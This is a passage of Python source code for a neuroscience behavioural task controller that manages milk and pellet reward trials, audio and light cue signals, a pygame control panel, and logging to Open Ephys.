if conditions['distance_from_goal_feeder']:
# If subject reached goal location, proceed with reward
self.update_game_counters_successful(self.MilkGoal.copy_ID())
self.MilkTrialSignals.stop(self.MilkGoal.copy_ID())
ID = self.MilkGoal.copy_ID()
self.MilkGoal.next(game_counters=self.game_counters)
return 'GameState_MilkReward', {'action': 'GameState_MilkTrial', 'ID': ID, 'trial_type': 'repeat'}
elif conditions['milk_trial_duration']:
# If time limit for task duration has passed, stop milk trial without reward
self.MilkTrialSignals.stop(self.MilkGoal.copy_ID())
self.MilkGoal.next(game_counters=self.game_counters)
return 'GameState_MilkTrial_Fail', {'reason': 'timeout'}
elif not (conditions['distance_from_other_feeders'] is None) and conditions['distance_from_other_feeders']:
# If subject went to incorrect location, stop milk trial with negative feedback
self.MilkTrialSignals.stop(self.MilkGoal.copy_ID())
self.MilkTrialSignals.fail(self.MilkGame_Variables.closest_feeder_ID())
self.MilkGoal.next(game_counters=self.game_counters)
return 'GameState_MilkTrial_Fail', {'reason': 'incorrect_feeder'}
def repeat_logic(self, **kwargs):
if self.MilkGoal.check_if_first_repetition():
return self.logic_first_trial(**kwargs)
else:
return self.logic_other_trial(**kwargs)
class GameState_MilkTrial_Fail(GameState):
"""
In this state the game halts for the duration of milk trial penalty.
This is implemented in pre_logic to avoid warnings regarding slow processing
in GameState.repeat_logic method.
"""
def __init__(self, **kwargs):
# Parse input arguments
self.MessageToOE = kwargs['MessageToOE']
self.penalty_duration = kwargs['MilkTrialFailPenalty']
def pre_logic(self, **kwargs):
self.MessageToOE('GameState_MilkTrial_Fail ' + kwargs['reason'])
# Start penalty timer
sleep(self.penalty_duration)
def repeat_logic(self, **kwargs):
return 'GameState_Interval', {}
class GameState_MilkReward(GameState):
"""
This state just means milk reward is released.
This is implemented in pre_logic method to avoid
warnings about too slow processing in GameState.repeat_logic method.
"""
def __init__(self, **kwargs):
# Parse input arguments
self.MessageToOE = kwargs['MessageToOE']
self.MilkTrialSignals = kwargs['MilkTrialSignals']
self.quantity = kwargs['MilkQuantity']
self.reward_device = kwargs['MilkRewardDevices']
def pre_logic(self, **kwargs):
if not ('suppress_MessageToOE' in kwargs.keys()) or not kwargs['suppress_MessageToOE']:
self.MessageToOE('GameState_MilkReward ' + kwargs['action'])
# Parse input arguments
ID = kwargs['ID']
if 'quantity' in kwargs.keys():
quantity = kwargs['quantity']
else:
if 'trial_type' in kwargs:
quantity = self.quantity[kwargs['trial_type']]
else:
quantity = 0
for key in self.quantity:
quantity = max(quantity, self.quantity[key])
# Send command to release reward and wait for positive feedback
feedback = self.reward_device.actuator_method_call(ID, 'release', quantity)
if feedback:
# Send message to Open Ephys GUI
OEmessage = 'Reward milk ' + ID + ' ' + str(quantity)
self.MessageToOE(OEmessage)
else:
# If failed, remove feeder from game and change button(s) red
self.reward_device.inactivate_feeder(ID)
# Send message to Open Ephys GUI
OEmessage = 'FEEDER milk ' + ID + ' inactivated'
self.MessageToOE(OEmessage)
def repeat_logic(self, **kwargs):
return 'GameState_Interval', {}
class GameStateOperator(object):
def __init__(self, TaskSettings, MessageToOE, Variables, game_counters, game_state_display_update,
PelletRewardDevices=None, PelletChoice=None, MilkRewardDevices=None,
MilkTrialSignals=None, MilkGoal=None):
"""
TaskSettings - dict - see below which values are required
MessageToOE - method - this method is called with string to log messages
Variables - dict - instance of same name classes
game_counters - dict -
game_state_display_update - method is called with string specifying current game state
The following input arguments are necessary depending
if pellet or milk game is active, based on TaskSettings['games_active'].
These input arguments should be instances of the same name classes:
PelletRewardDevices
PelletChoice
MilkRewardDevices
MilkTrialSignals
MilkGoal
"""
# Specify game update rate
self.game_rate = 5 # Game update rate in Hz
# Parse game state display input
self._game_state_display_update = game_state_display_update
# Start parsing input
kwargs = {}
# Parse TaskSettings
kwargs['games_active'] = TaskSettings['games_active']
kwargs['PelletMilkRatio'] = TaskSettings['PelletMilkRatio']
kwargs['PelletQuantity'] = TaskSettings['PelletQuantity']
kwargs['MilkTrialFailPenalty'] = TaskSettings['MilkTrialFailPenalty']
kwargs['MilkQuantity'] = TaskSettings['MilkQuantity']
kwargs['InitPellets'] = TaskSettings['InitPellets']
kwargs['InitMilk'] = TaskSettings['InitMilk']
# Parse generic inputs
kwargs['game_counters'] = game_counters
kwargs['MessageToOE'] = MessageToOE
kwargs['GenericGame_Variables'] = Variables.set_dict()['GenericGame_Variables']
# Parse pellet game inputs
if kwargs['games_active']['pellet']:
kwargs['PelletGame_Variables'] = Variables.set_dict()['PelletGame_Variables']
kwargs['PelletRewardDevices'] = PelletRewardDevices
kwargs['PelletChoice'] = PelletChoice
# Parse milk game inputs
if kwargs['games_active']['milk']:
kwargs['MilkGame_Variables'] = Variables.set_dict()['MilkGame_Variables']
kwargs['MilkRewardDevices'] = MilkRewardDevices
kwargs['MilkTrialSignals'] = MilkTrialSignals
kwargs['MilkGoal'] = MilkGoal
# Store for later use
self._GameState_kwargs = kwargs
def _display_update(self, game_state):
if game_state.startswith('GameState_'):
game_state_name = game_state[10:]
else:
game_state_name = game_state
self._game_state_display_update(game_state_name)
def _process(self):
self._active = True
self._display_update('GameState_Init_Rewards')
self._GameState = GameState_Init_Rewards(**self._GameState_kwargs)
ret = self._GameState.enter(self.game_rate, **{})
while self._active:
if ret is None:
self._active = False
else:
next_state, next_state_kwargs = ret
self._display_update(next_state)
next_state_class = globals()[next_state]
self._GameState = next_state_class(**self._GameState_kwargs)
ret = self._GameState.enter(self.game_rate, **next_state_kwargs)
def start(self):
self._T__process = Thread(target=self._process)
self._T__process.start()
def close(self):
self._active = False
self._GameState.exit()
self._T__process.join()
class MilkTrial_AudioSignal(object):
def __init__(self, actuator_method_call, MessageToOE, AudioSignalMode, FEEDERsettings):
"""
actuator_method_call - MilkRewardDevices.actuator_method_call method
MessageToOE - method is called when signal is started with a message string
AudioSignalMode - str - 'ambient' or 'localised'
FEEDERsettings - dict - key (ID) and value (feeder specific parameters)
"""
# Parse input
self.actuator_method_call = actuator_method_call
self.MessageToOE = MessageToOE
self.AudioSignalMode = AudioSignalMode
if self.AudioSignalMode == 'ambient':
self._init_ambient_sounds(FEEDERsettings)
def _init_ambient_sounds(self, FEEDERsettings):
self.ambient_sounds = {}
for ID in FEEDERsettings.keys():
self.ambient_sounds[ID] = createAudioSignal(FEEDERsettings[ID]['SignalHz'],
FEEDERsettings[ID]['SignalHzWidth'],
FEEDERsettings[ID]['ModulHz'])
def start(self, ID):
OEmessage = 'AudioSignal Start'
self.MessageToOE(OEmessage)
if self.AudioSignalMode == 'ambient':
self.ambient_sounds[ID].play(-1)
else:
self.actuator_method_call(ID, 'startTrialAudioSignal')
def stop(self, ID):
OEmessage = 'AudioSignal Stop'
self.MessageToOE(OEmessage)
if self.AudioSignalMode == 'ambient':
self.ambient_sounds[ID].stop()
else:
self.actuator_method_call(ID, 'stopTrialAudioSignal')
def play_negative(self, ID):
OEmessage = 'NegativeAudioSignal Play'
self.MessageToOE(OEmessage)
self.actuator_method_call(ID, 'playNegativeAudioSignal')
class MilkTrial_LightSignal(object):
def __init__(self, actuator_method_call, MessageToOE):
"""
actuator_method_call - MilkRewardDevices.actuator_method_call method
MessageToOE - method is called when signal is started with a message string
"""
# Parse input
self.actuator_method_call = actuator_method_call
self.MessageToOE = MessageToOE
# Prepare internal variables
self.light_on = False
self._waiting_on_delay = False
self._cancel_delay = False
def start(self, ID):
OEmessage = 'LightSignal Start'
self.MessageToOE(OEmessage)
self.actuator_method_call(ID, 'startLightSignal')
self.light_on = True
def stop(self, ID):
if self._waiting_on_delay:
self._cancel_delay = True
else:
OEmessage = 'LightSignal Stop'
self.MessageToOE(OEmessage)
self.actuator_method_call(ID, 'stopLightSignal')
self.light_on = False
def _delayed_starter(self, ID, delay):
"""
delay - float - time to wait in seconds
"""
self._waiting_on_delay = True
sleep(delay)
self._waiting_on_delay = False
if not self._cancel_delay:
self.start(ID)
self._cancel_delay = False
def start_delayed(self, ID, delay):
Thread(target=self._delayed_starter, args=(ID, delay)).start()
class MilkTrialSignals(object):
def __init__(self, TaskSettings, actuator_method_call, MessageToOE, FEEDERsettings=None):
"""
TaskSettings - dict - General Task settings. See below for what is used.
actuator_method_call - MilkRewardDevices.actuator_method_call method
MessageToOE - method is called when signal is started with a message string
FEEDERsettings - dict - key (ID) and value (feeder specific parameters)
"""
# Parse TaskSettings
self.FirstTrialLightOn = TaskSettings['LightSignalOnRepetitions']['presentation']
self.OtherTrialLightOn = TaskSettings['LightSignalOnRepetitions']['repeat']
self.lightSignalDelay = TaskSettings['lightSignalDelay']
self.lightSignalProbability = TaskSettings['lightSignalProbability']
AudioSignalMode = TaskSettings['AudioSignalMode']
# Initialize signals
self.MilkTrial_AudioSignal = MilkTrial_AudioSignal(actuator_method_call, MessageToOE,
AudioSignalMode, FEEDERsettings)
if self.FirstTrialLightOn or self.OtherTrialLightOn:
self.MilkTrial_LightSignal = MilkTrial_LightSignal(actuator_method_call, MessageToOE)
def light_signal_probabilistic_determinant(self):
if self.lightSignalProbability > 0.99:
return True
if random.random() < self.lightSignalProbability:
return True
else:
return False
def start(self, ID, first_repetition=False):
self.MilkTrial_AudioSignal.start(ID)
# Show light signal ONLY
# if its this goal has been achieved and other repetitions are set to have light signal
# OR
# if this goal has not been achieved and first repetition is set to have light signal.
if first_repetition and self.FirstTrialLightOn:
start_light_signal = True
elif (not first_repetition) and self.OtherTrialLightOn:
start_light_signal = True
else:
start_light_signal = False
if start_light_signal:
start_light_signal = self.light_signal_probabilistic_determinant()
if start_light_signal:
if self.lightSignalDelay > 0:
self.MilkTrial_LightSignal.start_delayed(ID, self.lightSignalDelay)
else:
self.MilkTrial_LightSignal.start(ID)
def stop(self, ID):
self.MilkTrial_AudioSignal.stop(ID)
if hasattr(self, 'MilkTrial_LightSignal') and self.MilkTrial_LightSignal.light_on:
self.MilkTrial_LightSignal.stop(ID)
def fail(self, ID):
self.MilkTrial_AudioSignal.play_negative(ID)
class Buttons(object):
def __init__(self, position_on_screen, renderText,
PelletRewardDevices=None, MilkRewardDevices=None):
"""
position_on_screen - dict - ['top', 'bottom', 'left', 'right'] border of the buttons
on screen provided to Buttons.render method
renderText - pygame.font.SysFont.render method for an existing font instace
PelletRewardDevices - instance of class with same name.
If not provided, relevant buttons will not be created.
MilkRewardDevices - instance of class with same name.
If not provided, relevant buttons will not be created.
"""
self._PelletRewardDevices = PelletRewardDevices
self._MilkRewardDevices = MilkRewardDevices
self._define()
self.list = Buttons._pre_render(self.list, position_on_screen, renderText)
def buttonGameOnOff_callback(self, button):
pass
def buttonReleaseReward_callback(self, button):
if False:
pass
else:
button['enabled'] = False
sleep(0.5)
button['enabled'] = True
def buttonManualPellet_callback(self, button):
button['button_pressed'] = True
sleep(0.5)
button['button_pressed'] = False
def buttonMilkTrial_callback(self, button):
if False:
pass
else:
button['enabled'] = False
sleep(0.5)
button['enabled'] = True
def get(self, name, FEEDER_ID=None):
button = self.list[self.names.index(name)]
if isinstance(button, list):
if FEEDER_ID is None:
raise ValueError('get needs FEEDER_ID for this button_name.')
else:
for subbutton in button:
if 'text' in subbutton.keys() and subbutton['text'] == FEEDER_ID:
button = subbutton
break
return button
def _inactivate_device(self, device_type, ID):
"""
This method is called whenever a device is inactivated
"""
if device_type == 'pellet':
# Inactivate pellet reward button
self.get('buttonReleasePellet', ID)['enabled'] = False
elif device_type == 'milk':
# Inactivate milk reward button
self.get('buttonReleaseMilk', ID)['enabled'] = False
# Inactivate milk trial button
self.get('buttonMilkTrial', ID)['enabled'] = False
else:
raise ValueError('Unknown device_type.')
def _define(self):
"""
Add or remove buttons in this function
Create new callbacks for new button if necessary
Callbacks are called at button click in a new thread with button dictionary as argument
Note default settings applied in Buttons._addDefaultProperties method
"""
self.list = []
self.names = []
# Game On/Off button
buttonGameOnOff = {'callback': self.buttonGameOnOff_callback,
'text': 'Game Off',
'toggled': {'text': 'Game On',
'color': (0, 128, 0)}}
self.list.append(buttonGameOnOff)
self.names.append('buttonGameOnOff')
# Button to mark manually released pellet
buttonManualPellet = {'callback': self.buttonManualPellet_callback,
'text': 'Manual Pellet',
'toggled': {'text': 'Manual Pellet',
'color': (0, 128, 0)}}
self.list.append(buttonManualPellet)
self.names.append('buttonManualPellet')
# Button to release pellet
if not (self._PelletRewardDevices is None):
buttonReleasePellet = []
buttonReleasePellet.append({'text': 'Release Pellet'})
for ID in self._PelletRewardDevices.IDs_active:
nFeederButton = {'callback': self.buttonReleaseReward_callback,
'callargs': ['pellet', ID],
'text': ID,
'enabled': True,
'toggled': {'text': ID,
'color': (0, 128, 0)}}
buttonReleasePellet.append(nFeederButton)
self.list.append(buttonReleasePellet)
self.names.append('buttonReleasePellet')
# Button to start milkTrial
if not (self._MilkRewardDevices is None):
buttonMilkTrial = []
buttonMilkTrial.append({'text': 'Milk Trial'})
for ID in self._MilkRewardDevices.IDs_active:
nFeederButton = {'callback': self.buttonMilkTrial_callback,
'callargs': [ID],
'text': ID,
'enabled': True,
'toggled': {'text': ID,
'color': (0, 128, 0)}}
buttonMilkTrial.append(nFeederButton)
self.list.append(buttonMilkTrial)
self.names.append('buttonMilkTrial')
# Button to release milk
if not (self._MilkRewardDevices is None):
buttonReleaseMilk = []
buttonReleaseMilk.append({'text': 'Deposit Milk'})
for ID in self._MilkRewardDevices.IDs_active:
nFeederButton = {'callback': self.buttonReleaseReward_callback,
'callargs': ['milk', ID],
'text': ID,
'enabled': True,
'toggled': {'text': ID,
'color': (0, 128, 0)}}
buttonReleaseMilk.append(nFeederButton)
self.list.append(buttonReleaseMilk)
self.names.append('buttonReleaseMilk')
# Add default properties to all buttons
self.list = Buttons._addDefaultProperties(self.list)
@staticmethod
def _addDefaultProperties(buttons):
# Add default color to all buttons
for i, button in enumerate(buttons):
if isinstance(button, dict):
if not ('color' in button.keys()):
buttons[i]['color'] = (128, 128, 128)
elif isinstance(button, list):
for j, subbutton in enumerate(button[1:]):
if not ('color' in subbutton.keys()):
buttons[i][j + 1]['color'] = (128, 128, 128)
# Add default button un-pressed state
for i, button in enumerate(buttons):
if isinstance(button, dict):
if not ('button_pressed' in button.keys()):
buttons[i]['button_pressed'] = False
elif isinstance(button, list):
for j, subbutton in enumerate(button[1:]):
if not ('button_pressed' in subbutton.keys()):
buttons[i][j + 1]['button_pressed'] = False
# Add default button enabled state
for i, button in enumerate(buttons):
if isinstance(button, dict):
if not ('enabled' in button.keys()):
buttons[i]['enabled'] = True
if not ('enabled' in button.keys()):
buttons[i]['not_enabled_color'] = (255, 0, 0)
elif isinstance(button, list):
for j, subbutton in enumerate(button[1:]):
if not ('enabled' in subbutton.keys()):
buttons[i][j + 1]['enabled'] = True
if not ('not_enabled_color' in subbutton.keys()):
buttons[i][j + 1]['not_enabled_color'] = (255, 0, 0)
return buttons
@staticmethod
def _pre_render(buttons, position_on_screen, renderText):
# Compute button locations
xpos = position_on_screen['left']
xlen = position_on_screen['right'] - position_on_screen['left']
ypos = np.linspace(position_on_screen['top'], position_on_screen['bottom'], 2 * len(buttons))
ylen = ypos[1] - ypos[0]
ypos = ypos[::2]
for i, button in enumerate(buttons):
if isinstance(button, dict):
buttons[i]['Position'] = (int(round(xpos)), int(round(ypos[i])), int(round(xlen)), int(round(ylen)))
elif isinstance(button, list):
xsubpos = np.linspace(xpos, xpos + xlen, 2 * (len(button) - 1))
xsublen = xsubpos[1] - xsubpos[0]
xsubpos = xsubpos[::2]
for j, subbutton in enumerate(button):
if j == 0:
buttons[i][j]['Position'] = (int(round(xpos)), int(round(ypos[i])), int(round(xlen)), int(round(ylen / 2.0)))
else:
buttons[i][j]['Position'] = (int(round(xsubpos[j - 1])), int(round(ypos[i] + ylen / 2.0)), int(round(xsublen)), int(round(ylen / 2.0)))
# Create button rectangles
for i, button in enumerate(buttons):
if isinstance(button, dict):
buttons[i]['Rect'] = pygame.Rect(button['Position'])
elif isinstance(button, list):
for j, subbutton in enumerate(button[1:]):
buttons[i][j + 1]['Rect'] = pygame.Rect(subbutton['Position'])
# Render button texts
for i, button in enumerate(buttons):
if isinstance(button, dict):
buttons[i]['textRendered'] = renderText(button['text'])
if 'toggled' in button.keys():
buttons[i]['toggled']['textRendered'] = renderText(button['toggled']['text'])
elif isinstance(button, list):
for j, subbutton in enumerate(button):
buttons[i][j]['textRendered'] = renderText(subbutton['text'])
if 'toggled' in subbutton.keys():
buttons[i][j]['toggled']['textRendered'] = renderText(subbutton['toggled']['text'])
return buttons
@staticmethod
def _draw_button(screen, button):
if button['enabled']:
# If button is pressed down, use the toggled color and text
if button['button_pressed']:
color = button['toggled']['color']
textRendered = button['toggled']['textRendered']
else:
color = button['color']
textRendered = button['textRendered']
else:
# If button is not enabled, use the 'not_enabled_color' and default text
color = button['not_enabled_color']
textRendered = button['textRendered']
pygame.draw.rect(screen, color, button['Position'], 0)
screen.blit(textRendered, button['Position'][:2])
def render(self, screen):
# Draw all self.list here
for i, button in enumerate(self.list):
if isinstance(button, dict):
Buttons._draw_button(screen, button)
elif isinstance(button, list):
# Display name for button group
screen.blit(button[0]['textRendered'], button[0]['Position'][:2])
for j, subbutton in enumerate(button[1:]):
Buttons._draw_button(screen, subbutton)
def click(self, pos):
"""
Checks if pos matches collidepoint of any buttons in self.list
If there is a match, callback function is called for that button,
if it is enabled (['enabled'] = True).
"""
for button in self.list:
if isinstance(button, dict):
if button['Rect'].collidepoint(pos) and button['enabled']:
Thread(target=button['callback'], args=(button,)).start()
elif isinstance(button, list):
for subbutton in button[1:]:
if subbutton['Rect'].collidepoint(pos) and subbutton['enabled']:
Thread(target=subbutton['callback'], args=(subbutton,)).start()
class InfoDisplay(object):
def __init__(self, renderText, position, game_counters):
self._renderText = renderText
self._position = position
self._game_counters = game_counters
self._game_state = ''
self._game_state_Lock = Lock()
def update_game_state(self, game_state):
with self._game_state_Lock:
self._game_state = game_state
def get_game_state(self):
with self._game_state_Lock:
return self._game_state
def render(self, screen):
# Compute window borders
xborder = (self._position['left'], self._position['right'])
yborder = (self._position['top'], self._position['bottom'])
# Compute text spacing
textSpacing = 3
textSpace = 10 + textSpacing
# Display game state
game_state_pos = (xborder[0], yborder[0])
screen.blit(self._renderText('Game State:'), game_state_pos)
game_state_current_pos = (xborder[0], yborder[0] + textSpace)
screen.blit(self._renderText(str(self.get_game_state().upper())), game_state_current_pos)
# Split rest of screen in 5 columns
title_topedge = game_state_pos[1] + 3 * textSpace
topedge = game_state_pos[1] + 4 * textSpace
columnedges = np.linspace(xborder[0], xborder[1], 10)
columnedges = columnedges[::2]
# Display Pellet Game info
if 'Pellets' in self._game_counters.keys():
# Display pellet feeder IDs
screen.blit(self._renderText('ID'), (columnedges[0], title_topedge))
for i, ID in enumerate(self._game_counters['Pellets']['ID']):
screen.blit(self._renderText(ID), (columnedges[0], topedge + i * textSpace))
# Display pellet counts
screen.blit(self._renderText('pellets'), (columnedges[1], title_topedge))
for i, count in enumerate(self._game_counters['Pellets']['count']):
screen.blit(self._renderText(str(count)), (columnedges[1], topedge + i * textSpace))
# Display Milk Game info
if 'Milk trials' in self._game_counters.keys():
# Display milk feeder IDs
screen.blit(self._renderText('ID'), (columnedges[2], title_topedge))
for i, ID in enumerate(self._game_counters['Milk trials']['ID']):
screen.blit(self._renderText(ID), (columnedges[2], topedge + i * textSpace))
# Display milk trial counts
screen.blit(self._renderText('milk trials'), (columnedges[3], title_topedge))
for i, count in enumerate(self._game_counters['Milk trials']['count']):
screen.blit(self._renderText(str(count)), (columnedges[3], topedge + i * textSpace))
# Display successful milk trial counts
screen.blit(self._renderText('successful'), (columnedges[4], title_topedge))
for i, count in enumerate(self._game_counters['Successful']['count']):
screen.blit(self._renderText(str(count)), (columnedges[4], topedge + i * textSpace))
class TextRenderer(object):
def __init__(self):
self._font = pygame.font.SysFont('Arial', 10)
self._color = (255, 255, 255)
def render(self, text):
return self._font.render(text, True, self._color)
class Display(object):
def __init__(self, size, variable_display, button_display, info_display, update_rate=20):
"""
size - tuple - (width, height) of screen as int
variable_display - VariableDisplay instance render method
button_display - Buttons instance render method
info_display - InfoDisplay instance render method
"""
self._render_methods = []
self._render_methods.append(variable_display)
self._render_methods.append(button_display)
self._render_methods.append(info_display)
self._screen = pygame.display.set_mode(size)
self._update_rate = update_rate
def _update(self):
self._screen.fill((0, 0, 0))
for renderer in self._render_methods:
renderer(self._screen)
pygame.display.update()
def _process(self):
self._continue = True
loop_clock = pygame.time.Clock()
while self._continue:
self._update()
loop_duration = loop_clock.tick(self._update_rate)
if loop_duration > (25 + 1000 / self._update_rate):
warnings.warn('Method logic in ' + str(type(self)) + \
' runs slower than assigned ' + \
'rate ' + str(self._update_rate) + ' Hz. Duration ' + \
str(loop_duration) + ' ms.', RuntimeWarning)
def start(self):
self._T__process = Thread(target=self._process)
self._T__process.start()
def close(self):
if hasattr(self, '_T__process'):
self._continue = False
self._T__process.join()
@staticmethod
def Positions(n_variables):
# Set constants for screen shape
margins = 20
height = 300
variables_width = n_variables * 80
buttons_width = 300
text_width = 300
# Compute screen size
size = (6 * margins + variables_width + buttons_width + text_width , 300)
# Compute position of variable bars
variables = {'top': margins,
'bottom': size[1] - margins,
'left': margins,
'right': margins + variables_width}
# Compute position for buttons
buttons = {'top': margins,
'bottom': size[1] - margins,
'left': 3 * margins + variables_width,
'right': 3 * margins + variables_width + buttons_width}
# Compute position for counters
counters = {'top': margins,
'bottom': size[1] - margins,
'left': 5 * margins + variables_width + buttons_width,
'right': 5 * margins + variables_width + buttons_width + text_width}
return size, variables, buttons, counters
class UserEventHandler(object):
def __init__(self, button_click_method, KillSwitch, response_rate=60):
self._button_click_method = button_click_method
self._KillSwitch = KillSwitch
self._response_rate = response_rate
def _check_events(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
self._KillSwitch()
elif event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
# Process click with Buttons class click detector
Thread(target=self._button_click_method, args=(event.pos,)).start()
def _process(self):
self._continue = True
loop_clock = pygame.time.Clock()
while self._continue:
self._check_events()
loop_duration = loop_clock.tick(self._response_rate)
if loop_duration > (25 + 1000 / self._response_rate):
warnings.warn('Method logic in ' + str(type(self)) + \
' runs slower than assigned ' + \
'rate ' + str(self._response_rate) + ' Hz. Duration ' + \
str(self._response_rate) + ' ms.', RuntimeWarning)
def start(self):
self._T__process = Thread(target=self._process)
self._T__process.start()
def close(self):
if hasattr(self, '_T__process'):
self._continue = False
self._T__process.join()
class Core(object):
def __init__(self, TaskSettings, open_ephys_message_pipe, processed_position_list,
processed_position_update_interval, position_histogram_array, position_histogram_dict):
"""Initializes all possible devices to prepare for start command.
:param TaskSettings:
:param multiprocessing.connection open_ephys_message_pipe:
:param multiprocessing.managers.List processed_position_list:
:param int processed_position_update_interval:
:param multiprocessing.Array position_histogram_array:
:param multiprocessing.managers.Dict position_histogram_dict:
"""
# Parse input
FEEDERs = TaskSettings.pop('FEEDERs')
self.TaskSettings = TaskSettings
self.open_ephys_message_pipe = open_ephys_message_pipe
self.processed_position_list = processed_position_list
self.processed_position_update_interval = processed_position_update_interval
self.position_histogram_array = position_histogram_array
self.position_histogram_dict = position_histogram_dict
self._closed = False
# Initialize pygame engine
init_pygame()
# Initialize Pellet Rewards
if self.TaskSettings['games_active']['pellet']:
print('Initializing Pellet FEEDERs...')
self.PelletRewardDevices = RewardDevices(FEEDERs['pellet'], 'pellet',
self.TaskSettings['Username'],
self.TaskSettings['Password'],
inactivation_signal=self._inactivation_signal)
print('Initializing Pellet FEEDERs Successful')
else:
self.PelletRewardDevices = None
# Initialize Milk Rewards
if self.TaskSettings['games_active']['milk']:
print('Initializing Milk FEEDERs ...')
feeder_kwargs = Core.prepare_milk_feeder_kwargs(FEEDERs['milk'], TaskSettings)
self.MilkRewardDevices = RewardDevices(FEEDERs['milk'], 'milk',
self.TaskSettings['Username'],
self.TaskSettings['Password'],
feeder_kwargs=feeder_kwargs,
inactivation_signal=self._inactivation_signal)
print('Initializing Milk FEEDERs Successful')
else:
self.MilkRewardDevices = None
# Initialize counters
self.game_counters = {}
if self.TaskSettings['games_active']['pellet']:
self.game_counters['Pellets'] = {'ID': deepcopy(self.PelletRewardDevices.IDs_active),
'count': [0] * len(self.PelletRewardDevices.IDs_active)}
if self.TaskSettings['games_active']['milk']:
self.game_counters['Milk trials'] = {'ID': deepcopy(self.MilkRewardDevices.IDs_active),
'count': [0] * len(self.MilkRewardDevices.IDs_active)}
self.game_counters['Successful'] = {'ID': deepcopy(self.MilkRewardDevices.IDs_active),
'count': [0] * len(self.MilkRewardDevices.IDs_active)}
# Initialize Pellet Game
if self.TaskSettings['games_active']['pellet']:
self.PelletChoice = PelletChoice(self.PelletRewardDevices, self.position_histogram_array,
self.position_histogram_dict, self.TaskSettings['arena_size'])
else:
self.PelletChoice = None
# Initialize Milk Game
if self.TaskSettings['games_active']['milk']:
self.MilkTrialSignals = MilkTrialSignals(self.TaskSettings,
self.MilkRewardDevices.actuator_method_call,
self.send_message_to_open_ephys, FEEDERs['milk'])
self.MilkGoal = MilkGoal(self.MilkRewardDevices.IDs_active,
next_feeder_method=self.TaskSettings['MilkGoalNextFeederMethod'],
repetitions=self.TaskSettings['MilkGoalRepetition'])
else:
self.MilkTrialSignals = None
self.MilkGoal = None
# Prepare chewing counter
if self.TaskSettings['games_active']['pellet']:
self.ChewingTracker = ChewingTracker(self.TaskSettings['Chewing_TTLchan'])
self.chewing_tracker_update_method_thread = Thread(target=self.chewing_tracker_update_method)
self.chewing_tracker_update_method_thread.start()
else:
self.ChewingTracker = None
@property
def closed(self):
return self._closed
def send_message_to_open_ephys(self, message):
self.open_ephys_message_pipe.send(message)
def chewing_tracker_update_method(self):
while not self.closed:
if self.open_ephys_message_pipe.poll(0.1):
message = self.open_ephys_message_pipe.recv()
self.ChewingTracker.check_for_chewing_message(message)
@staticmethod
def prepare_milk_feeder_kwargs(FEEDERs, TaskSettings):
"""
Prepares specific milk feeder kwargs for use in Reward Devices class
FEEDERs - dict - key (ID) and value (feeder specific parameters)
TaskSettings - dict - see below for used keys
"""
# Grab relavant values from TaskSettings
AudioSignalMode = TaskSettings['AudioSignalMode']
negativeAudioSignal = TaskSettings['NegativeAudioSignal']
lightSignalIntensity = TaskSettings['lightSignalIntensity']
lightSignalPins = list(map(int, TaskSettings['lightSignalPins'].split(',')))
# Create settings for each feeder ID
feeder_kwargs = {}
for ID in FEEDERs.keys():
if AudioSignalMode == 'ambient':
trialAudioSignal = None
elif AudioSignalMode == 'localised':
trialAudioSignal = (FEEDERs[ID]['SignalHz'],
FEEDERs[ID]['SignalHzWidth'],
FEEDERs[ID]['ModulHz'])
feeder_kwargs[ID] = {'trialAudioSignal': trialAudioSignal,
'negativeAudioSignal': negativeAudioSignal,
'lightSignalIntensity': lightSignalIntensity,
'lightSignalPins': lightSignalPins}
return feeder_kwargs
def _final_initialization(self):
"""
Final initialization that depends on task inputs to be active (e.g. tracking).
"""
# Initialize text rendering for faster display
self.TextRenderer = TextRenderer()
# Initialize variables first to find out how many are in use
self.Variables = Core.init_Variables(self.TaskSettings, self.processed_position_list,
self.processed_position_update_interval, self.ChewingTracker,
self.MilkRewardDevices, self.MilkGoal)
# Get positions of all display elements based on number of variables
display_size, variable_pos, buttons_pos, info_pos = Display.Positions(len(self.Variables.full_list()))
# Initialize variable display
self.VariableDisplay = VariableDisplay(variable_pos, self.TextRenderer.render,
self.Variables)
# Initialize buttons along with button rendering
self.Buttons = Buttons(buttons_pos, self.TextRenderer.render,
self.PelletRewardDevices, self.MilkRewardDevices)
# Initialize info display
self.InfoDisplay = InfoDisplay(self.TextRenderer.render, info_pos, self.game_counters)
# Initialize display
self.Display = Display(display_size, self.VariableDisplay.render,
self.Buttons.render, self.InfoDisplay.render)
# Initialize Game State Process
self.GameStateOperator = GameStateOperator(self.TaskSettings, self.send_message_to_open_ephys,
self.Variables, self.game_counters,
self.InfoDisplay.update_game_state,
self.PelletRewardDevices, self.PelletChoice,
self.MilkRewardDevices, self.MilkTrialSignals,
self.MilkGoal)
# Initialize user event detection and handling
self.UserEventHandler = UserEventHandler(self.Buttons.click, self.KillSwitch)
@staticmethod
def init_Variables(TaskSettings, processed_position_list, processed_position_update_interval,
ChewingTracker=None, MilkRewardDevices=None, MilkGoal=None):
# Pre-compute variables
TaskSettings['one_second_steps'] = \
int(np.round(1 / processed_position_update_interval))
TaskSettings['max_distance_in_arena'] = \
int(round(np.hypot(TaskSettings['arena_size'][0], TaskSettings['arena_size'][1])))
TaskSettings['distance_steps'] = \
int(np.round(TaskSettings['LastTravelTime'] * TaskSettings['one_second_steps']))
TaskSettings['angular_distance_steps'] = \
int(np.round(TaskSettings['MilkTaskGoalAngularDistanceTime'] * TaskSettings['one_second_steps']))
# Start Variable class
return Variables(TaskSettings, processed_position_list, ChewingTracker, MilkRewardDevices, MilkGoal)
def _inactivation_signal(self, device_type, ID):
"""
This method is passed to reward devices and invoked each time a device is inactivated.
"""
self.Buttons._inactivate_device(device_type, ID)
if device_type == 'pellet':
self.PelletChoice._ensure_nearest_feeder_map_valid(self.PelletRewardDevices.IDs_active)
elif device_type == 'milk':
self.MilkGoal.re_init(self.MilkRewardDevices.IDs_active)
else:
raise ValueError('Unknown device_type: ' + str(device_type))
def run(self):
# Perform final initialization steps
self._final_initialization()
# Start Display
self.Display.start()
# Start Game State Process
self.GameStateOperator.start()
# Start Display event detection
self.UserEventHandler.start()
def KillSwitch(self):
"""
Allows shutting down all downstream and upstream processes.
Can be called by child processes.
"""
self.stop()
def stop(self):
print('Closing Task processes ...')
# Stop Display event detection
if hasattr(self, 'UserEventHandler'):
self.UserEventHandler.close()
# Stop Game State Process
if hasattr(self, 'GameStateOperator'):
self.GameStateOperator.close()
# Stop updating display
if hasattr(self, 'Display'):
self.Display.close()
